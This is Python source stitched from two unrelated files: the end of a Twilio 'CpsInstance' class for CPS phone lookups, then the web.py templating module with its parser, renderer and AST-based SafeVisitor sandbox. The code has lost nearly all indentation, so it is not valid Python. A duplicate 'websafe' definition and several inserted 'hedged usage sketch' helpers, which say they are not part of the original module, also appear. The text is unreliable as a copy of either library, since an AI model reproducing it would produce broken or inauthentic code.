super(CpsInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'cps_url': payload.get('cps_url'),
'phone_number': payload.get('phone_number'),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: CpsContext for this CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsContext
"""
if self._context is None:
self._context = CpsContext(self._version, )
return self._context
@property
def cps_url(self):
"""
:returns: CPS URL of the phone number.
:rtype: unicode
"""
return self._properties['cps_url']
@property
def phone_number(self):
"""
:returns: Phone number passed.
:rtype: unicode
"""
return self._properties['phone_number']
@property
def url(self):
"""
:returns: The URL of this resource.
:rtype: unicode
"""
return self._properties['url']
def fetch(self, x_xcnam_sensitive_phone_number=values.unset):
"""
Fetch the CpsInstance
:param unicode x_xcnam_sensitive_phone_number: Phone number to retrieve CPS.
:returns: The fetched CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsInstance
"""
return self._proxy.fetch(x_xcnam_sensitive_phone_number=x_xcnam_sensitive_phone_number, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.TrustedComms.CpsInstance {}>'.format(context)
# ---------------------------------------------------------------------------
"""
simple, elegant templating
(part of web.py)
Template design:
Template string is split into tokens and the tokens are combined into nodes.
Parse tree is a nodelist. TextNode and ExpressionNode are simple nodes and
for-loop, if-loop etc are block nodes, which contain multiple child nodes.
Each node can emit some Python string. The Python string emitted by the
root node is validated for safeeval and executed using Python in the given environment.
Care is taken to make sure the generated code and the template match line for line,
so that error messages can point to the exact line number in the template. (This still doesn't work in some cases.)
Grammar:
template -> defwith sections
defwith -> '$def with (' arguments ')' | ''
sections -> section*
section -> block | assignment | line
assignment -> '$ ' <assignment expression>
line -> (text|expr)*
text -> <any characters other than $>
expr -> '$' pyexpr | '$(' pyexpr ')' | '${' pyexpr '}'
pyexpr -> <python expression>
"""
__all__ = [
"Template",
"Render", "render", "frender",
"ParseError", "SecurityError",
"test"
]
import tokenize
import os
import glob
import re
from utils import storage, safeunicode, safestr, re_compile
from webapi import config
from net import websafe
def splitline(text):
r"""
Splits the given text at newline.
>>> splitline('foo\nbar')
('foo\n', 'bar')
>>> splitline('foo')
('foo', '')
>>> splitline('')
('', '')
"""
index = text.find('\n') + 1
if index:
return text[:index], text[index:]
else:
return text, ''
class Parser:
"""Parser Base.
"""
def __init__(self):
self.statement_nodes = STATEMENT_NODES
self.keywords = KEYWORDS
def parse(self, text, name="<template>"):
self.text = text
self.name = name
defwith, text = self.read_defwith(text)
suite = self.read_suite(text)
return DefwithNode(defwith, suite)
def read_defwith(self, text):
if text.startswith('$def with'):
defwith, text = splitline(text)
defwith = defwith[1:].strip() # strip $ and spaces
return defwith, text
else:
return '', text
def read_section(self, text):
r"""Reads one section from the given text.
section -> block | assignment | line
>>> read_section = Parser().read_section
>>> read_section('foo\nbar\n')
(<line: [t'foo\n']>, 'bar\n')
>>> read_section('$ a = b + 1\nfoo\n')
(<assignment: 'a = b + 1'>, 'foo\n')
        read_section('$for i in range(10):\n    hello $i\nfoo')
"""
if text.lstrip(' ').startswith('$'):
index = text.index('$')
begin_indent, text2 = text[:index], text[index+1:]
ahead = self.python_lookahead(text2)
if ahead == 'var':
return self.read_var(text2)
elif ahead in self.statement_nodes:
return self.read_block_section(text2, begin_indent)
elif ahead in self.keywords:
return self.read_keyword(text2)
elif ahead.strip() == '':
                # an assignment starts with a space after $
# ex: $ a = b + 2
return self.read_assignment(text2)
return self.readline(text)
def read_var(self, text):
r"""Reads a var statement.
>>> read_var = Parser().read_var
>>> read_var('var x=10\nfoo')
(<var: x = 10>, 'foo')
>>> read_var('var x: hello $name\nfoo')
(<var: x = join_(u'hello ', escape_(name, True))>, 'foo')
"""
line, text = splitline(text)
tokens = self.python_tokens(line)
if len(tokens) < 4:
raise SyntaxError('Invalid var statement')
name = tokens[1]
sep = tokens[2]
value = line.split(sep, 1)[1].strip()
if sep == '=':
pass # no need to process value
elif sep == ':':
            #@@ Hack for backward-compatibility
if tokens[3] == '\n': # multi-line var statement
block, text = self.read_indented_block(text, ' ')
lines = [self.readline(x)[0] for x in block.splitlines()]
nodes = []
for x in lines:
nodes.extend(x.nodes)
nodes.append(TextNode('\n'))
else: # single-line var statement
linenode, _ = self.readline(value)
nodes = linenode.nodes
parts = [node.emit('') for node in nodes]
value = "join_(%s)" % ", ".join(parts)
else:
raise SyntaxError('Invalid var statement')
return VarNode(name, value), text
def read_suite(self, text):
r"""Reads section by section till end of text.
>>> read_suite = Parser().read_suite
>>> read_suite('hello $name\nfoo\n')
[<line: [t'hello ', $name, t'\n']>, <line: [t'foo\n']>]
"""
sections = []
while text:
section, text = self.read_section(text)
sections.append(section)
return SuiteNode(sections)
def readline(self, text):
r"""Reads one line from the text. Newline is supressed if the line ends with \.
>>> readline = Parser().readline
>>> readline('hello $name!\nbye!')
(<line: [t'hello ', $name, t'!\n']>, 'bye!')
>>> readline('hello $name!\\\nbye!')
(<line: [t'hello ', $name, t'!']>, 'bye!')
>>> readline('$f()\n\n')
(<line: [$f(), t'\n']>, '\n')
"""
line, text = splitline(text)
        # suppress newline if the line ends with \
if line.endswith('\\\n'):
line = line[:-2]
nodes = []
while line:
node, line = self.read_node(line)
nodes.append(node)
return LineNode(nodes), text
def read_node(self, text):
r"""Reads a node from the given text and returns the node and remaining text.
>>> read_node = Parser().read_node
>>> read_node('hello $name')
(t'hello ', '$name')
>>> read_node('$name')
($name, '')
"""
if text.startswith('$$'):
return TextNode('$'), text[2:]
elif text.startswith('$#'): # comment
line, text = splitline(text)
return TextNode('\n'), text
elif text.startswith('$'):
text = text[1:] # strip $
if text.startswith(':'):
escape = False
text = text[1:] # strip :
else:
escape = True
return self.read_expr(text, escape=escape)
else:
return self.read_text(text)
def read_text(self, text):
r"""Reads a text node from the given text.
>>> read_text = Parser().read_text
>>> read_text('hello $name')
(t'hello ', '$name')
"""
index = text.find('$')
if index < 0:
return TextNode(text), ''
else:
return TextNode(text[:index]), text[index:]
def read_keyword(self, text):
line, text = splitline(text)
return StatementNode(line.strip() + "\n"), text
def read_expr(self, text, escape=True):
"""Reads a python expression from the text and returns the expression and remaining text.
expr -> simple_expr | paren_expr
simple_expr -> id extended_expr
extended_expr -> attr_access | paren_expr extended_expr | ''
attr_access -> dot id extended_expr
paren_expr -> [ tokens ] | ( tokens ) | { tokens }
>>> read_expr = Parser().read_expr
>>> read_expr("name")
($name, '')
>>> read_expr("a.b and c")
($a.b, ' and c')
>>> read_expr("a. b")
($a, '. b')
>>> read_expr("name</h1>")
($name, '</h1>')
>>> read_expr("(limit)ing")
($(limit), 'ing')
>>> read_expr('a[1, 2][:3].f(1+2, "weird string[).", 3 + 4) done.')
($a[1, 2][:3].f(1+2, "weird string[).", 3 + 4), ' done.')
"""
def simple_expr():
identifier()
extended_expr()
def identifier():
tokens.next()
def extended_expr():
lookahead = tokens.lookahead()
if lookahead is None:
return
elif lookahead.value == '.':
attr_access()
elif lookahead.value in parens:
paren_expr()
extended_expr()
else:
return
def attr_access():
from token import NAME # python token constants
dot = tokens.lookahead()
if tokens.lookahead2().type == NAME:
tokens.next() # consume dot
identifier()
extended_expr()
def paren_expr():
begin = tokens.next().value
end = parens[begin]
while True:
if tokens.lookahead().value in parens:
paren_expr()
else:
t = tokens.next()
if t.value == end:
break
return
parens = {
"(": ")",
"[": "]",
"{": "}"
}
def get_tokens(text):
"""tokenize text using python tokenizer.
Python tokenizer ignores spaces, but they might be important in some cases.
This function introduces dummy space tokens when it identifies any ignored space.
Each token is a storage object containing type, value, begin and end.
"""
readline = iter([text]).next
end = None
for t in tokenize.generate_tokens(readline):
t = storage(type=t[0], value=t[1], begin=t[2], end=t[3])
if end is not None and end != t.begin:
_, x1 = end
_, x2 = t.begin
yield storage(type=-1, value=text[x1:x2], begin=end, end=t.begin)
end = t.end
yield t
class BetterIter:
"""Iterator like object with 2 support for 2 look aheads."""
def __init__(self, items):
self.iteritems = iter(items)
self.items = []
self.position = 0
self.current_item = None
def lookahead(self):
if len(self.items) <= self.position:
self.items.append(self._next())
return self.items[self.position]
def _next(self):
try:
return self.iteritems.next()
except StopIteration:
return None
def lookahead2(self):
if len(self.items) <= self.position+1:
self.items.append(self._next())
return self.items[self.position+1]
def next(self):
self.current_item = self.lookahead()
self.position += 1
return self.current_item
tokens = BetterIter(get_tokens(text))
if tokens.lookahead().value in parens:
paren_expr()
else:
simple_expr()
row, col = tokens.current_item.end
return ExpressionNode(text[:col], escape=escape), text[col:]
def read_assignment(self, text):
r"""Reads assignment statement from text.
>>> read_assignment = Parser().read_assignment
>>> read_assignment('a = b + 1\nfoo')
(<assignment: 'a = b + 1'>, 'foo')
"""
line, text = splitline(text)
return AssignmentNode(line.strip()), text
def python_lookahead(self, text):
"""Returns the first python token from the given text.
>>> python_lookahead = Parser().python_lookahead
>>> python_lookahead('for i in range(10):')
'for'
>>> python_lookahead('else:')
'else'
>>> python_lookahead(' x = 1')
' '
"""
readline = iter([text]).next
tokens = tokenize.generate_tokens(readline)
return tokens.next()[1]
def python_tokens(self, text):
readline = iter([text]).next
tokens = tokenize.generate_tokens(readline)
return [t[1] for t in tokens]
def read_indented_block(self, text, indent):
r"""Read a block of text. A block is what typically follows a for or it statement.
It can be in the same line as that of the statement or an indented block.
>>> read_indented_block = Parser().read_indented_block
>>> read_indented_block(' a\n b\nc', ' ')
('a\nb\n', 'c')
>>> read_indented_block(' a\n b\n c\nd', ' ')
('a\n b\nc\n', 'd')
>>> read_indented_block(' a\n\n b\nc', ' ')
('a\n\n b\n', 'c')
"""
if indent == '':
return '', text
block = ""
while text:
line, text2 = splitline(text)
if line.strip() == "":
block += '\n'
elif line.startswith(indent):
block += line[len(indent):]
else:
break
text = text2
return block, text
def read_statement(self, text):
r"""Reads a python statement.
>>> read_statement = Parser().read_statement
>>> read_statement('for i in range(10): hello $name')
('for i in range(10):', ' hello $name')
"""
tok = PythonTokenizer(text)
tok.consume_till(':')
return text[:tok.index], text[tok.index:]
def read_block_section(self, text, begin_indent=''):
r"""
>>> read_block_section = Parser().read_block_section
>>> read_block_section('for i in range(10): hello $i\nfoo')
(<block: 'for i in range(10):', [<line: [t'hello ', $i, t'\n']>]>, 'foo')
>>> read_block_section('for i in range(10):\n hello $i\n foo', begin_indent=' ')
(<block: 'for i in range(10):', [<line: [t'hello ', $i, t'\n']>]>, ' foo')
>>> read_block_section('for i in range(10):\n hello $i\nfoo')
(<block: 'for i in range(10):', [<line: [t'hello ', $i, t'\n']>]>, 'foo')
"""
line, text = splitline(text)
stmt, line = self.read_statement(line)
keyword = self.python_lookahead(stmt)
        # if there is something left on the line
if line.strip():
block = line.lstrip()
else:
def find_indent(text):
rx = re_compile(' +')
match = rx.match(text)
first_indent = match and match.group(0)
return first_indent or ""
# find the indentation of the block by looking at the first line
first_indent = find_indent(text)[len(begin_indent):]
#TODO: fix this special case
if keyword == "code":
indent = begin_indent + first_indent
else:
indent = begin_indent + min(first_indent, INDENT)
block, text = self.read_indented_block(text, indent)
return self.create_block_node(keyword, stmt, block, begin_indent), text
def create_block_node(self, keyword, stmt, block, begin_indent):
if keyword in self.statement_nodes:
return self.statement_nodes[keyword](stmt, block, begin_indent)
else:
raise ParseError, 'Unknown statement: %s' % repr(keyword)
class PythonTokenizer:
"""Utility wrapper over python tokenizer."""
def __init__(self, text):
self.text = text
readline = iter([text]).next
self.tokens = tokenize.generate_tokens(readline)
self.index = 0
def consume_till(self, delim):
"""Consumes tokens till colon.
>>> tok = PythonTokenizer('for i in range(10): hello $i')
>>> tok.consume_till(':')
>>> tok.text[:tok.index]
'for i in range(10):'
>>> tok.text[tok.index:]
' hello $i'
"""
try:
while True:
t = self.next()
if t.value == delim:
break
elif t.value == '(':
self.consume_till(')')
elif t.value == '[':
self.consume_till(']')
elif t.value == '{':
self.consume_till('}')
# if end of line is found, it is an exception.
# Since there is no easy way to report the line number,
# leave the error reporting to the python parser later
#@@ This should be fixed.
if t.value == '\n':
break
except:
#raise ParseError, "Expected %s, found end of line." % repr(delim)
# raising ParseError doesn't show the line number.
# if this error is ignored, then it will be caught when compiling the python code.
return
def next(self):
type, t, begin, end, line = self.tokens.next()
row, col = end
self.index = col
return storage(type=type, value=t, begin=begin, end=end)
class DefwithNode:
def __init__(self, defwith, suite):
if defwith:
self.defwith = defwith.replace('with', '__template__') + ':'
# offset 3 lines. for __lineoffset__, loop and self.
self.defwith += "\n __lineoffset__ = -3"
else:
self.defwith = 'def __template__():'
# offset 4 lines for __template__, __lineoffset__, loop and self.
self.defwith += "\n __lineoffset__ = -4"
self.defwith += "\n loop = ForLoop()"
self.defwith += "\n self = TemplateResult(); extend_ = self.extend"
self.suite = suite
self.end = "\n return self"
def emit(self, indent):
return self.defwith + self.suite.emit(indent + INDENT) + self.end
def __repr__(self):
return "<defwith: %s, %s>" % (self.defwith, self.suite)
class TextNode:
def __init__(self, value):
self.value = value
def emit(self, indent):
return repr(safeunicode(self.value))
def __repr__(self):
return 't' + repr(self.value)
class ExpressionNode:
def __init__(self, value, escape=True):
self.value = value.strip()
# convert ${...} to $(...)
if value.startswith('{') and value.endswith('}'):
self.value = '(' + self.value[1:-1] + ')'
self.escape = escape
def emit(self, indent):
return 'escape_(%s, %s)' % (self.value, bool(self.escape))
def __repr__(self):
if self.escape:
escape = ''
else:
escape = ':'
return "$%s%s" % (escape, self.value)
class AssignmentNode:
def __init__(self, code):
self.code = code
def emit(self, indent, begin_indent=''):
return indent + self.code + "\n"
def __repr__(self):
return "<assignment: %s>" % repr(self.code)
class LineNode:
def __init__(self, nodes):
self.nodes = nodes
def emit(self, indent, text_indent='', name=''):
text = [node.emit('') for node in self.nodes]
if text_indent:
text = [repr(text_indent)] + text
return indent + "extend_([%s])\n" % ", ".join(text)
def __repr__(self):
return "<line: %s>" % repr(self.nodes)
INDENT = u' ' # 4 spaces
class BlockNode:
def __init__(self, stmt, block, begin_indent=''):
self.stmt = stmt
self.suite = Parser().read_suite(block)
self.begin_indent = begin_indent
def emit(self, indent, text_indent=''):
text_indent = self.begin_indent + text_indent
out = indent + self.stmt + self.suite.emit(indent + INDENT, text_indent)
return out
def __repr__(self):
return "<block: %s, %s>" % (repr(self.stmt), repr(self.suite))
class ForNode(BlockNode):
def __init__(self, stmt, block, begin_indent=''):
self.original_stmt = stmt
tok = PythonTokenizer(stmt)
tok.consume_till('in')
a = stmt[:tok.index] # for i in
b = stmt[tok.index:-1] # rest of for stmt excluding :
stmt = a + ' loop.setup(' + b.strip() + '):'
BlockNode.__init__(self, stmt, block, begin_indent)
def __repr__(self):
return "<block: %s, %s>" % (repr(self.original_stmt), repr(self.suite))
class CodeNode:
def __init__(self, stmt, block, begin_indent=''):
# compensate one line for $code:
self.code = "\n" + block
def emit(self, indent, text_indent=''):
import re
rx = re.compile('^', re.M)
return rx.sub(indent, self.code).rstrip(' ')
def __repr__(self):
return "<code: %s>" % repr(self.code)
class StatementNode:
def __init__(self, stmt):
self.stmt = stmt
def emit(self, indent):
return indent + self.stmt
def __repr__(self):
return "<stmt: %s>" % repr(self.stmt)
class IfNode(BlockNode):
pass
class ElseNode(BlockNode):
pass
class ElifNode(BlockNode):
pass
class DefNode(BlockNode):
def __init__(self, *a, **kw):
BlockNode.__init__(self, *a, **kw)
code = CodeNode("", "")
code.code = "self = TemplateResult(); extend_ = self.extend\n"
self.suite.sections.insert(0, code)
code = CodeNode("", "")
code.code = "return self\n"
self.suite.sections.append(code)
def emit(self, indent, text_indent=''):
text_indent = self.begin_indent + text_indent
out = indent + self.stmt + self.suite.emit(indent + INDENT, text_indent)
return indent + "__lineoffset__ -= 3\n" + out
class VarNode:
def __init__(self, name, value):
self.name = name
self.value = value
def emit(self, indent, text_indent):
return indent + "self[%s] = %s\n" % (repr(self.name), self.value)
def __repr__(self):
return "<var: %s = %s>" % (self.name, self.value)
class SuiteNode:
"""Suite is a list of sections."""
def __init__(self, sections):
self.sections = sections
def emit(self, indent, text_indent=''):
return "\n" + "".join([s.emit(indent, text_indent) for s in self.sections])
def __repr__(self):
return repr(self.sections)
STATEMENT_NODES = {
'for': ForNode,
'while': BlockNode,
'if': IfNode,
'elif': ElifNode,
'else': ElseNode,
'def': DefNode,
'code': CodeNode
}
KEYWORDS = [
"pass",
"break",
"continue",
"return"
]
TEMPLATE_BUILTIN_NAMES = [
"dict", "enumerate", "float", "int", "bool", "list", "long", "reversed",
"set", "slice", "tuple", "xrange",
"abs", "all", "any", "callable", "chr", "cmp", "divmod", "filter", "hex",
"id", "isinstance", "iter", "len", "max", "min", "oct", "ord", "pow", "range",
"True", "False",
"None",
"__import__", # some c-libraries like datetime requires __import__ to present in the namespace
]
import __builtin__
TEMPLATE_BUILTINS = dict([(name, getattr(__builtin__, name)) for name in TEMPLATE_BUILTIN_NAMES if name in __builtin__.__dict__])
class ForLoop:
"""
    Wrapper for expression in for statement to support loop.xxx helpers.
>>> loop = ForLoop()
>>> for x in loop.setup(['a', 'b', 'c']):
... print loop.index, loop.revindex, loop.parity, x
...
1 3 odd a
2 2 even b
3 1 odd c
>>> loop.index
Traceback (most recent call last):
...
AttributeError: index
"""
def __init__(self):
self._ctx = None
def __getattr__(self, name):
if self._ctx is None:
raise AttributeError, name
else:
return getattr(self._ctx, name)
def setup(self, seq):
self._push()
return self._ctx.setup(seq)
def _push(self):
self._ctx = ForLoopContext(self, self._ctx)
def _pop(self):
self._ctx = self._ctx.parent
class ForLoopContext:
"""Stackable context for ForLoop to support nested for loops.
"""
def __init__(self, forloop, parent):
self._forloop = forloop
self.parent = parent
def setup(self, seq):
try:
self.length = len(seq)
except:
self.length = 0
self.index = 0
for a in seq:
self.index += 1
yield a
self._forloop._pop()
index0 = property(lambda self: self.index-1)
first = property(lambda self: self.index == 1)
last = property(lambda self: self.index == self.length)
odd = property(lambda self: self.index % 2 == 1)
even = property(lambda self: self.index % 2 == 0)
parity = property(lambda self: ['odd', 'even'][self.even])
revindex0 = property(lambda self: self.length - self.index)
revindex = property(lambda self: self.length - self.index + 1)
class BaseTemplate:
def __init__(self, code, filename, filter, globals, builtins):
self.filename = filename
self.filter = filter
self._globals = globals
self._builtins = builtins
if code:
self.t = self._compile(code)
else:
self.t = lambda: ''
def _compile(self, code):
env = self.make_env(self._globals or {}, self._builtins)
exec(code, env)
return env['__template__']
def __call__(self, *a, **kw):
__hidetraceback__ = True
return self.t(*a, **kw)
def make_env(self, globals, builtins):
return dict(globals,
__builtins__=builtins,
ForLoop=ForLoop,
TemplateResult=TemplateResult,
escape_=self._escape,
join_=self._join
)
def _join(self, *items):
return u"".join(items)
def _escape(self, value, escape=False):
if value is None:
value = ''
value = safeunicode(value)
if escape and self.filter:
value = self.filter(value)
return value
_htmlquote_re = re.compile(r'[&<>"\']')
_htmlquote_d = {
    u"&": u"&amp;",
    u"<": u"&lt;",
    u">": u"&gt;",
    u"'": u"&#39;",
    u'"': u"&quot;",
}
def websafe(text):
r"""
Encodes `text` for raw use in HTML.
>>> websafe(u"<'&\">")
    u'&lt;&#39;&amp;&quot;&gt;'
Unlike the websafe function in utils.py, this works with unicode text.
"""
return _htmlquote_re.sub(lambda m: _htmlquote_d[m.group(0)], text)
class Template(BaseTemplate):
CONTENT_TYPES = {
'.html' : 'text/html; charset=utf-8',
'.xhtml' : 'application/xhtml+xml; charset=utf-8',
'.txt' : 'text/plain',
}
FILTERS = {
'.html': websafe,
'.xhtml': websafe,
'.xml': websafe
}
globals = {}
def __init__(self, text, filename='<template>', filter=None, globals=None, builtins=None, extensions=None):
self.extensions = extensions or []
text = Template.normalize_text(text)
code = self.compile_template(text, filename)
_, ext = os.path.splitext(filename)
filter = filter or self.FILTERS.get(ext, None)
self.content_type = self.CONTENT_TYPES.get(ext, None)
if globals is None:
globals = self.globals
if builtins is None:
builtins = TEMPLATE_BUILTINS
BaseTemplate.__init__(self, code=code, filename=filename, filter=filter, globals=globals, builtins=builtins)
def normalize_text(text):
"""Normalizes template text by correcting \r\n, tabs and BOM chars."""
text = text.replace('\r\n', '\n').replace('\r', '\n').expandtabs()
if not text.endswith('\n'):
text += '\n'
        # ignore BOM chars at the beginning of template
        BOM = '\xef\xbb\xbf'
        if isinstance(text, str) and text.startswith(BOM):
            text = text[len(BOM):]
        # support \$ for backward-compatibility
        text = text.replace(r'\$', '$$')
return text
normalize_text = staticmethod(normalize_text)
def __call__(self, *a, **kw):
__hidetraceback__ = True
import webapi as web
if 'headers' in web.ctx and self.content_type:
web.header('Content-Type', self.content_type, unique=True)
return BaseTemplate.__call__(self, *a, **kw)
def generate_code(text, filename, parser=None):
# parse the text
parser = parser or Parser()
rootnode = parser.parse(text, filename)
# generate python code from the parse tree
code = rootnode.emit(indent="").strip()
return safestr(code)
generate_code = staticmethod(generate_code)
def create_parser(self):
p = Parser()
for ext in self.extensions:
p = ext(p)
return p
def compile_template(self, template_string, filename):
code = Template.generate_code(template_string, filename, parser=self.create_parser())
def get_source_line(filename, lineno):
try:
lines = open(filename).read().splitlines()
return lines[lineno]
except:
return None
try:
# compile the code first to report the errors, if any, with the filename
compiled_code = compile(code, filename, 'exec')
except SyntaxError, e:
# display template line that caused the error along with the traceback.
try:
e.msg += '\n\nTemplate traceback:\n File %s, line %s\n %s' % \
(repr(e.filename), e.lineno, get_source_line(e.filename, e.lineno-1))
except:
pass
raise
# make sure code is safe
import compiler
ast = compiler.parse(code)
SafeVisitor().walk(ast, filename)
return compiled_code
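# Hedged usage sketch (not part of the original module): rendering a template
# string directly with the Template class defined above. The template text and
# argument are illustrative only.
def _demo_template_usage():
    t = Template("$def with (name)\nHello $name!")
    return t('world')   # a TemplateResult; unicode(...) yields u'Hello world!\n'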
class CompiledTemplate(Template):
def __init__(self, f, filename):
Template.__init__(self, '', filename)
self.t = f
def compile_template(self, *a):
return None
def _compile(self, *a):
return None
class Render:
"""The most preferred way of using templates.
render = web.template.render('templates')
print render.foo()
The optional `base` parameter can be used to pass the output of
every template through the base template.
render = web.template.render('templates', base='layout')
"""
def __init__(self, loc='templates', cache=None, base=None, **keywords):
self._loc = loc
self._keywords = keywords
if cache is None:
cache = not config.get('debug', False)
if cache:
self._cache = {}
else:
self._cache = None
if base and not hasattr(base, '__call__'):
# make base a function, so that it can be passed to sub-renders
self._base = lambda page: self._template(base)(page)
else:
self._base = base
def _add_global(self, obj, name=None):
"""Add a global to this rendering instance."""
if 'globals' not in self._keywords: self._keywords['globals'] = {}
if not name:
name = obj.__name__
self._keywords['globals'][name] = obj
def _lookup(self, name):
path = os.path.join(self._loc, name)
if os.path.isdir(path):
return 'dir', path
else:
path = self._findfile(path)
if path:
return 'file', path
else:
return 'none', None
def _load_template(self, name):
kind, path = self._lookup(name)
if kind == 'dir':
return Render(path, cache=self._cache is not None, base=self._base, **self._keywords)
elif kind == 'file':
return Template(open(path).read(), filename=path, **self._keywords)
else:
raise AttributeError, "No template named " + name
def _findfile(self, path_prefix):
p = [f for f in glob.glob(path_prefix + '.*') if not f.endswith('~')] # skip backup files
p.sort() # sort the matches for deterministic order
return p and p[0]
def _template(self, name):
if self._cache is not None:
if name not in self._cache:
self._cache[name] = self._load_template(name)
return self._cache[name]
else:
return self._load_template(name)
def __getattr__(self, name):
t = self._template(name)
if self._base and isinstance(t, Template):
def template(*a, **kw):
return self._base(t(*a, **kw))
return template
else:
return self._template(name)
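# Hedged sketch (illustrative names, not part of the original module): the
# lookup flow implemented by Render.__getattr__, assuming a 'templates/'
# directory that contains foo.html and a layout.html base template.
def _demo_render_usage():
    r = Render('templates', base='layout')
    return r.foo()   # renders foo.html, then passes the result through layout.html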
class GAE_Render(Render):
# Render gets over-written. make a copy here.
super = Render
def __init__(self, loc, *a, **kw):
GAE_Render.super.__init__(self, loc, *a, **kw)
import types
if isinstance(loc, types.ModuleType):
self.mod = loc
else:
name = loc.rstrip('/').replace('/', '.')
self.mod = __import__(name, None, None, ['x'])
self.mod.__dict__.update(kw.get('builtins', TEMPLATE_BUILTINS))
self.mod.__dict__.update(Template.globals)
self.mod.__dict__.update(kw.get('globals', {}))
def _load_template(self, name):
t = getattr(self.mod, name)
import types
if isinstance(t, types.ModuleType):
return GAE_Render(t, cache=self._cache is not None, base=self._base, **self._keywords)
else:
return t
render = Render
# setup render for Google App Engine.
try:
from google import appengine
render = Render = GAE_Render
except ImportError:
pass
def frender(path, **keywords):
"""Creates a template from the given file path.
"""
return Template(open(path).read(), filename=path, **keywords)
def compile_templates(root):
"""Compiles templates to python code."""
re_start = re_compile('^', re.M)
for dirpath, dirnames, filenames in os.walk(root):
filenames = [f for f in filenames if not f.startswith('.') and not f.endswith('~') and not f.startswith('__init__.py')]
for d in dirnames[:]:
if d.startswith('.'):
dirnames.remove(d) # don't visit this dir
out = open(os.path.join(dirpath, '__init__.py'), 'w')
out.write('from web.template import CompiledTemplate, ForLoop, TemplateResult\n\n')
if dirnames:
out.write("import " + ", ".join(dirnames))
out.write("_dummy = CompiledTemplate(lambda: None, 'dummy')\n")
out.write("join_ = _dummy._join\n")
out.write("escape_ = _dummy._escape\n")
out.write("\n")
for f in filenames:
path = os.path.join(dirpath, f)
if '.' in f:
name, _ = f.split('.', 1)
else:
name = f
text = open(path).read()
text = Template.normalize_text(text)
code = Template.generate_code(text, path)
code = code.replace("__template__", name, 1)
out.write(code)
out.write('\n\n')
out.write('%s = CompiledTemplate(%s, %s)\n\n' % (name, name, repr(path)))
# create template to make sure it compiles
t = Template(open(path).read(), path)
out.close()
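# Hedged usage sketch (illustrative path): compile a template directory once so
# it can later be imported as a plain python package of CompiledTemplate
# objects instead of being reparsed at start-up.
def _demo_compile_templates():
    compile_templates('templates')   # writes templates/__init__.py
    import templates                 # attributes are now CompiledTemplate instances
    return templates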
class ParseError(Exception):
pass
class SecurityError(Exception):
"""The template seems to be trying to do something naughty."""
pass
# Enumerate all the allowed AST nodes
ALLOWED_AST_NODES = [
"Add", "And",
# "AssAttr",
"AssList", "AssName", "AssTuple",
# "Assert",
"Assign", "AugAssign",
# "Backquote",
"Bitand", "Bitor", "Bitxor", "Break",
"CallFunc","Class", "Compare", "Const", "Continue",
"Decorators", "Dict", "Discard", "Div",
"Ellipsis", "EmptyNode",
# "Exec",
"Expression", "FloorDiv", "For",
# "From",
"Function",
"GenExpr", "GenExprFor", "GenExprIf", "GenExprInner",
"Getattr",
# "Global",
"If", "IfExp",
# "Import",
"Invert", "Keyword", "Lambda", "LeftShift",
"List", "ListComp", "ListCompFor", "ListCompIf", "Mod",
"Module",
"Mul", "Name", "Not", "Or", "Pass", "Power",
# "Print", "Printnl", "Raise",
"Return", "RightShift", "Slice", "Sliceobj",
"Stmt", "Sub", "Subscript",
# "TryExcept", "TryFinally",
"Tuple", "UnaryAdd", "UnarySub",
"While", "With", "Yield",
]
class SafeVisitor(object):
"""
Make sure code is safe by walking through the AST.
Code considered unsafe if:
* it has restricted AST nodes
* it is trying to access restricted attributes
Adopted from http://www.zafar.se/bkz/uploads/safe.txt (public domain, Babar K. Zafar)
"""
def __init__(self):
"Initialize visitor by generating callbacks for all AST node types."
self.errors = []
def walk(self, ast, filename):
"Validate each node in AST and raise SecurityError if the code is not safe."
self.filename = filename
self.visit(ast)
if self.errors:
raise SecurityError, '\n'.join([str(err) for err in self.errors])
def visit(self, node, *args):
"Recursively validate node and all of its children."
def classname(obj):
return obj.__class__.__name__
nodename = classname(node)
fn = getattr(self, 'visit' + nodename, None)
if fn:
fn(node, *args)
else:
if nodename not in ALLOWED_AST_NODES:
self.fail(node, *args)
for child in node.getChildNodes():
self.visit(child, *args)
def visitName(self, node, *args):
"Disallow any attempts to access a restricted attr."
#self.assert_attr(node.getChildren()[0], node)
pass
def visitGetattr(self, node, *args):
"Disallow any attempts to access a restricted attribute."
self.assert_attr(node.attrname, node)
def assert_attr(self, attrname, node):
if self.is_unallowed_attr(attrname):
lineno = self.get_node_lineno(node)
e = SecurityError("%s:%d - access to attribute '%s' is denied" % (self.filename, lineno, attrname))
self.errors.append(e)
def is_unallowed_attr(self, name):
return name.startswith('_') \
or name.startswith('func_') \
or name.startswith('im_')
def get_node_lineno(self, node):
return (node.lineno) and node.lineno or 0
def fail(self, node, *args):
"Default callback for unallowed AST nodes."
lineno = self.get_node_lineno(node)
nodename = node.__class__.__name__
e = SecurityError("%s:%d - execution of '%s' statements is denied" % (self.filename, lineno, nodename))
self.errors.append(e)
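# Hedged sketch of the check above (not part of the original module):
# SafeVisitor rejects code that reaches for restricted (underscore) attributes.
# Uses the same Python 2 'compiler' module as compile_template.
def _demo_safevisitor():
    import compiler
    ast = compiler.parse("x.__class__")
    try:
        SafeVisitor().walk(ast, '<demo>')
    except SecurityError, e:
        return str(e)   # "<demo>:1 - access to attribute '__class__' is denied"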
class TemplateResult(storage):
"""Dictionary like object for storing template output.
A template can specify key-value pairs in the output using
`var` statements. Each `var` statement adds a new key to the
template output and the main output is stored with key
__body__.
>>> d = TemplateResult(__body__='hello, world', x='foo')
>>> d
<TemplateResult: {'__body__': 'hello, world', 'x': 'foo'}>
>>> print d
hello, world
>>> d = TemplateResult()
>>> d.extend([u'hello', u'world'])
>>> d
<TemplateResult: {'__body__': u'helloworld'}>
"""
def __init__(self, *a, **kw):
storage.__init__(self, *a, **kw)
self.setdefault("__body__", None)
# set _data via __dict__ so the list isn't stored as the item self["_data"]
self.__dict__["_data"] = []
self.__dict__["extend"] = self._data.extend
def __getitem__(self, name):
if name == "__body__" and storage.__getitem__(self, '__body__') is None:
self["__body__"] = u"".join(self._data)
return storage.__getitem__(self, name)
def __unicode__(self):
return self["__body__"]
